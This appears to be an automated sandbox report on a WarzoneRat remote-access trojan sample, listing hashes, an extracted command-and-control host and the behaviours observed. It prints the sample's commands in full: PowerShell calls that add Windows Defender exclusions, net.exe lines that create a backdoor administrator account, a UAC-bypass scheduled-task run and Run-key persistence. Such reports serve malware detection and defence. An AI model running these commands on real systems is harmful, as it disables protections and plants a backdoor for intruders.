Analysis
-
max time kernel
143s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
02-07-2022 15:40
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Variant.Tedy.123517.9877.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Variant.Tedy.123517.9877.exe
Resource
win10v2004-20220414-en
General
-
Target
SecuriteInfo.com.Variant.Tedy.123517.9877.exe
-
Size
1.8MB
-
MD5
212b1e774e310dbe4e92b01854f31d53
-
SHA1
635349bf28642a2a4b32155fe2864f6dfd51a483
-
SHA256
d22de2ac8939c185e56867b691702abd0304adf75c2b62dbff801228bdcf0dbe
-
SHA512
3c7be7251079c9610ddd5923307d4887746d6f43c8dcf81d82e2696726000cf8912be1530f1a388cd4520289bf0722dc270defbe23a631771a83befc2d9f689e
Malware Config
Extracted
warzonerat
workstation2022.ddns.net:5254
Signatures
-
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Processes:
SecuriteInfo.com.Variant.Tedy.123517.9877.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths SecuriteInfo.com.Variant.Tedy.123517.9877.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Tedy.123517.9877.exe = "0" SecuriteInfo.com.Variant.Tedy.123517.9877.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\Documents\Boehorse\svchost.exe = "0" SecuriteInfo.com.Variant.Tedy.123517.9877.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Warzone RAT Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/1128-155-0x0000000000400000-0x0000000000555000-memory.dmp warzonerat behavioral2/memory/1128-157-0x0000000000400000-0x0000000000555000-memory.dmp warzonerat behavioral2/memory/1128-163-0x0000000000400000-0x0000000000555000-memory.dmp warzonerat behavioral2/memory/1128-176-0x0000000000400000-0x0000000000555000-memory.dmp warzonerat -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
SecuriteInfo.com.Variant.Tedy.123517.9877.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SecuriteInfo.com.Variant.Tedy.123517.9877.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
SecuriteInfo.com.Variant.Tedy.123517.9877.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation SecuriteInfo.com.Variant.Tedy.123517.9877.exe -
Processes:
SecuriteInfo.com.Variant.Tedy.123517.9877.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths SecuriteInfo.com.Variant.Tedy.123517.9877.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions SecuriteInfo.com.Variant.Tedy.123517.9877.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Tedy.123517.9877.exe = "0" SecuriteInfo.com.Variant.Tedy.123517.9877.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\Documents\Boehorse\svchost.exe = "0" SecuriteInfo.com.Variant.Tedy.123517.9877.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
SecuriteInfo.com.Variant.Tedy.123517.9877.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ROCKS = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\SecuriteInfo.com.Variant.Tedy.123517.9877.exe\"" SecuriteInfo.com.Variant.Tedy.123517.9877.exe Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ejxheadline = "C:\\Users\\Public\\Documents\\Boehorse\\svchost.exe" SecuriteInfo.com.Variant.Tedy.123517.9877.exe Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Ejxheadline = "C:\\Users\\Public\\Documents\\Boehorse\\svchost.exe" SecuriteInfo.com.Variant.Tedy.123517.9877.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
SecuriteInfo.com.Variant.Tedy.123517.9877.exedescription pid process target process PID 3124 set thread context of 1128 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe regedt32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
SecuriteInfo.com.Variant.Tedy.123517.9877.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe 4624 powershell.exe 4624 powershell.exe 1452 powershell.exe 3684 powershell.exe 2848 powershell.exe 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe 1452 powershell.exe 3684 powershell.exe 2848 powershell.exe 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
SecuriteInfo.com.Variant.Tedy.123517.9877.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe Token: SeDebugPrivilege 4624 powershell.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeDebugPrivilege 3684 powershell.exe Token: SeDebugPrivilege 2848 powershell.exe -
Suspicious use of WriteProcessMemory 50 IoCs
Processes:
SecuriteInfo.com.Variant.Tedy.123517.9877.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3124 wrote to memory of 4624 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe powershell.exe PID 3124 wrote to memory of 4624 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe powershell.exe PID 3124 wrote to memory of 4624 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe powershell.exe PID 3124 wrote to memory of 2432 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe net.exe PID 3124 wrote to memory of 2432 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe net.exe PID 3124 wrote to memory of 2432 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe net.exe PID 2432 wrote to memory of 4972 2432 net.exe net1.exe PID 2432 wrote to memory of 4972 2432 net.exe net1.exe PID 2432 wrote to memory of 4972 2432 net.exe net1.exe PID 3124 wrote to memory of 3272 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe net.exe PID 3124 wrote to memory of 3272 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe net.exe PID 3124 wrote to memory of 3272 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe net.exe PID 3272 wrote to memory of 1592 3272 net.exe net1.exe PID 3272 wrote to memory of 1592 3272 net.exe net1.exe PID 3272 wrote to memory of 1592 3272 net.exe net1.exe PID 3124 wrote to memory of 4976 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe net.exe PID 3124 wrote to memory of 4976 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe net.exe PID 3124 wrote to memory of 4976 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe net.exe PID 4976 wrote to memory of 4940 4976 net.exe net1.exe PID 4976 wrote to memory of 4940 4976 net.exe net1.exe PID 4976 wrote to memory of 4940 4976 net.exe net1.exe PID 3124 wrote to memory of 3320 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe net.exe PID 3124 wrote to memory of 3320 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe net.exe PID 3124 wrote to memory of 3320 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe net.exe PID 3320 wrote to memory of 4692 3320 net.exe net1.exe PID 3320 wrote to memory of 4692 3320 net.exe net1.exe PID 3320 wrote to memory of 4692 3320 net.exe net1.exe PID 3124 wrote to memory of 308 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe schtasks.exe PID 3124 wrote to memory of 308 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe schtasks.exe PID 3124 wrote to memory of 308 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe schtasks.exe PID 3124 wrote to memory of 1452 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe powershell.exe PID 3124 wrote to memory of 1452 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe powershell.exe PID 3124 wrote to memory of 1452 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe powershell.exe PID 3124 wrote to memory of 3684 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe powershell.exe PID 3124 wrote to memory of 3684 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe powershell.exe PID 3124 wrote to memory of 3684 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe powershell.exe PID 3124 wrote to memory of 2848 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe powershell.exe PID 3124 wrote to memory of 2848 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe powershell.exe PID 3124 wrote to memory of 2848 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe powershell.exe PID 3124 wrote to memory of 1128 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe regedt32.exe PID 3124 wrote to memory of 1128 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe regedt32.exe PID 3124 wrote to memory of 1128 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe regedt32.exe PID 3124 wrote to memory of 1128 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe regedt32.exe PID 3124 wrote to memory of 1128 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe regedt32.exe PID 3124 wrote to memory of 1128 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe regedt32.exe PID 3124 wrote to memory of 1128 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe regedt32.exe PID 3124 wrote to memory of 1128 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe regedt32.exe PID 3124 wrote to memory of 1128 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe regedt32.exe PID 3124 wrote to memory of 1128 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe regedt32.exe PID 3124 wrote to memory of 1128 3124 SecuriteInfo.com.Variant.Tedy.123517.9877.exe regedt32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Tedy.123517.9877.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Tedy.123517.9877.exe"1⤵
- Windows security bypass
- Checks BIOS information in registry
- Checks computer location settings
- Windows security modification
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Tedy.123517.9877.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add3⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators ADMIN~1 /add3⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup users "Admin" /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup users "Admin" /add3⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup administrators "Admin" /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators "Admin" /del3⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\Boehorse\svchost.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\Boehorse\svchost.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Tedy.123517.9877.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\regedt32.exe"C:\Windows\SysWOW64\regedt32.exe"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD55cd9282083a95352b2ae8bbcf5c0bfec
SHA1898d8e87993a8a18bef68343a8894e730d6e06c7
SHA256a124d40522e39a5cc156bfec06036558561c15d764abdeb57dcae94ef83b0332
SHA512dce15e171c9d5194b8e89b155b20519bd3ee6ee5038345eecb284b867e5de3f80a27808d09af1919383d5d07538056f5b3d5b189dc99049b5095a710e1634f63
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD56577418d00fa4f23e47266413ae9a751
SHA15473635edce6870e2c1cb51c3b9f845545008ce7
SHA256efa81d820e6ba5a1eceabcf1292652ac114119e11981d933cab1c37e754f890d
SHA5125e64f99497cdd64d80d829d94d9ec7478acc899616f0715c010cf13a94594e7027bd2eb23e4977a40d027a4e4152da0b622f26dbe4e2f38b19fc17d359352f93
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
5KB
MD563bdde4fb53099c413400d589cc220e6
SHA1c88bdb29dfd3a1bb7ff3f0f7ddb89b88fb2a2a4a
SHA2560ed6cce2ef27bb349b02b90fa50924d20157b8071a53cda75830b1ec3c302205
SHA512c42b13e87ef043e3d1932dd5cce23b8d2062ee336c22ab389b7ea2a5b0c251c18118dac6b848b9770c4c64280eada87369975a9e5f9bd78184c9ba2c0d3bd11e
-
memory/308-148-0x0000000000000000-mapping.dmp
-
memory/1128-157-0x0000000000400000-0x0000000000555000-memory.dmpFilesize
1.3MB
-
memory/1128-163-0x0000000000400000-0x0000000000555000-memory.dmpFilesize
1.3MB
-
memory/1128-176-0x0000000000400000-0x0000000000555000-memory.dmpFilesize
1.3MB
-
memory/1128-154-0x0000000000000000-mapping.dmp
-
memory/1128-155-0x0000000000400000-0x0000000000555000-memory.dmpFilesize
1.3MB
-
memory/1452-149-0x0000000000000000-mapping.dmp
-
memory/1452-166-0x0000000070AF0000-0x0000000070B3C000-memory.dmpFilesize
304KB
-
memory/1592-142-0x0000000000000000-mapping.dmp
-
memory/2432-138-0x0000000000000000-mapping.dmp
-
memory/2848-168-0x0000000070AF0000-0x0000000070B3C000-memory.dmpFilesize
304KB
-
memory/2848-151-0x0000000000000000-mapping.dmp
-
memory/3124-152-0x00000000092F0000-0x0000000009382000-memory.dmpFilesize
584KB
-
memory/3124-130-0x0000000000DE0000-0x0000000000FBA000-memory.dmpFilesize
1.9MB
-
memory/3124-134-0x0000000008260000-0x00000000082C6000-memory.dmpFilesize
408KB
-
memory/3124-131-0x0000000005A30000-0x0000000005ACC000-memory.dmpFilesize
624KB
-
memory/3124-132-0x00000000087A0000-0x0000000008D44000-memory.dmpFilesize
5.6MB
-
memory/3124-153-0x0000000008420000-0x000000000842A000-memory.dmpFilesize
40KB
-
memory/3272-141-0x0000000000000000-mapping.dmp
-
memory/3320-146-0x0000000000000000-mapping.dmp
-
memory/3684-150-0x0000000000000000-mapping.dmp
-
memory/3684-167-0x0000000070AF0000-0x0000000070B3C000-memory.dmpFilesize
304KB
-
memory/4624-164-0x0000000006FB0000-0x0000000006FBA000-memory.dmpFilesize
40KB
-
memory/4624-170-0x0000000007280000-0x000000000729A000-memory.dmpFilesize
104KB
-
memory/4624-159-0x0000000070AF0000-0x0000000070B3C000-memory.dmpFilesize
304KB
-
memory/4624-160-0x00000000061E0000-0x00000000061FE000-memory.dmpFilesize
120KB
-
memory/4624-161-0x0000000007580000-0x0000000007BFA000-memory.dmpFilesize
6.5MB
-
memory/4624-162-0x0000000006F40000-0x0000000006F5A000-memory.dmpFilesize
104KB
-
memory/4624-133-0x0000000000000000-mapping.dmp
-
memory/4624-145-0x0000000005C30000-0x0000000005C4E000-memory.dmpFilesize
120KB
-
memory/4624-165-0x00000000071C0000-0x0000000007256000-memory.dmpFilesize
600KB
-
memory/4624-135-0x0000000000E00000-0x0000000000E36000-memory.dmpFilesize
216KB
-
memory/4624-136-0x0000000004E30000-0x0000000005458000-memory.dmpFilesize
6.2MB
-
memory/4624-137-0x0000000004BD0000-0x0000000004BF2000-memory.dmpFilesize
136KB
-
memory/4624-169-0x0000000007170000-0x000000000717E000-memory.dmpFilesize
56KB
-
memory/4624-158-0x0000000006200000-0x0000000006232000-memory.dmpFilesize
200KB
-
memory/4624-171-0x0000000007260000-0x0000000007268000-memory.dmpFilesize
32KB
-
memory/4624-139-0x00000000054D0000-0x0000000005536000-memory.dmpFilesize
408KB
-
memory/4692-147-0x0000000000000000-mapping.dmp
-
memory/4940-144-0x0000000000000000-mapping.dmp
-
memory/4972-140-0x0000000000000000-mapping.dmp
-
memory/4976-143-0x0000000000000000-mapping.dmp